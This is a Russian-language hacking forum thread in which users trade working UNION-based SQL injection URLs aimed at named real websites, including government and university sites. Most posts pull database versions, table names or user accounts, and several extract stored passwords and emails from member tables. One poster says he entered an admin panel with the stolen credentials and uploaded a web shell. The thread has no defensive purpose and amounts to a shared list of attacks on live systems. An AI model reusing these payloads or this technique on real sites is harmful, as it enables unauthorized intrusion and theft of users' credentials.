SQL Инъекции

2 ice1k
самому слабо додумать дальше? =D

 

Набранное вами сообщение слишком короткое. Увеличьте ваше сообщение до 2 символов.
хек?

 

а мне пох http://www.a1tv.ru/AOpenBands.php?Band=-1163+union+select+1,2,concat(memberName,char(58),passwd),4,5+from+u19508.smf_members/*

 

Вот и правильно, я этого и ждал, чтобы кто-нить запостил нормальный вариант... - я думал этого никогда не случится

 

Code:

http://www.usug.ub.gov.mn/photo_more.php?ids=-10+union+select+1,2,3,table_name+from+information_schema.tables+limit+1,1/*

Code:

http://www.usug.ub.gov.mn/photo_more.php?ids=-10+union+select+1,2,3,column_name+from+information_schema.columns+limit+1,1/*

пару таблиц и колонок нашел, но прав не хватает похоже.

 

Code:

http://www.gramota.ru/news.html?nn=-2043+union+select+1,2,user(),4,5,6/*

_-[A.M.D]HiM@S-_, а хотя не, продолжай курить ту же

Code:

http://ru-hosting.ru/article.php?sid=2222222289+union+select+1,2,user(),4,5,6/*

хз было или нет

 

первые мои скули

Code:

http://www.tmx.kiev.ua/a-news/news.php?id=-2+union+select+1,2,3,version(),user(),6,7,8/*

Code:

http://www.kpla.kz/news.php?id=-2+union+select+1,2,3,4,user(),6/

Code:

http://ru-host.ru/next.php?id=3'

нечего так и не подобрал

 

omg, посмотри чуть выше.

 

кусочек экзотики

Code:

http://top.ge/cat.php?c=-1+union+select+1,2,3,4,5,6,7,8,9,10,AES_DECRYPT(AES_ENCRYPT(version(),0),0),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39/*

правда, таблицы подобрать не смог =\ утро...
//upd:
к mysql.user выводит "access denied for ...."

 

просто на страничку ничего не выводится
http://ru-host.ru/next.php?id=-2+union+select+1,2/*

 

http://php.uni-kassel.de/hrz/db4/extern/it_db/katalog/resultabg.php?q=-1+union+select+1,2,3,4,5,6,7,8,9/*

http://www.php.com/include/groups/showInfo.php?ID=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/*

 

на php.com я выкладывал уже, вроде даже этот скрипт.

По поводу первого - немного заюзаем уязвимость

Code:

http://www.uni-kassel.de/~sesame/_Welcome.html

тут скрипт, кажись админский
пассы выдираем запросом

Code:

http://php.uni-kassel.de/hrz/db4/extern/it_db/katalog/resultabg.php?q=-1+union+select+1,2,3,4,5,6,password,8,9+from+users/*

username не нужен, да и нет его в таблице имхо)

без проблем, это вполне нормально..
поиск не ищет, т.к. многие в [*code] пихают запросы) но оно и к лучшему)

 

я в цитаты кидаю, так ИМХО более читаемо =)
такс...

админовский логин и пароль, не удивляйтесь что лимит стоит =)

админка

Там кликаем куда нить слева (хз чё там написано) и льём шелл.
Шелл уже залит кстати =D но ссылку не могу дать ))

 

Code:

http://www.smartsystemsllc.com/ru/products.php?pr_id=-99+union+select+111,222/*

по-шарить так и не смог... ничерта не грузится =\ с каналом что-то =\

 

вот еще
http://mk.uct.ua/?q=category&id=-1+union+select+1,2,3,4,5,6,7,version()/*

 

__http://www.mywindow.ru/index.php?category=-1+union+select+1,2,concat(database(),char(58),user(),char(58),version()),4,5/*

__http://www.dreamokna.ru/?sec=15&item=10000000000+union+select+1,2,3/*

__http://www.akademokna.ru/pages.php?id=-1+union+select+1,concat(database(),char(58),user(),char(58),version())/*

 

Code:

http://www.rocit.ru/news/shownews.php3?id=30100+UNION+SELECT+1,USER_ID,3,4,5,6,7,8,9,0+FROM+USER/*

PR=6
Но к сожалению без вывода

Code:

http://www.ladofon.ru/news_detail.php?news_id=69+UNION+SELECT+1,2,3,concat(email,char(58),password),5,6,7,8+FROM+user/*

PR=4

 

Darg, мой тебе совет, по-крайней мере в этой теме... - если после твоего поста больше ничего не было - то просто нажимай -Edit- и добавляй новый пост в предыдущий... =\

 

Code:

http://www.tradeinter.ru/news.php?id=2'

Code:

http://www.tradeinter.ru/cat.php?id=77'

 

Врёте вы всё

Code:

http://www.tradeinter.ru/cat.php?id=-99+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31/*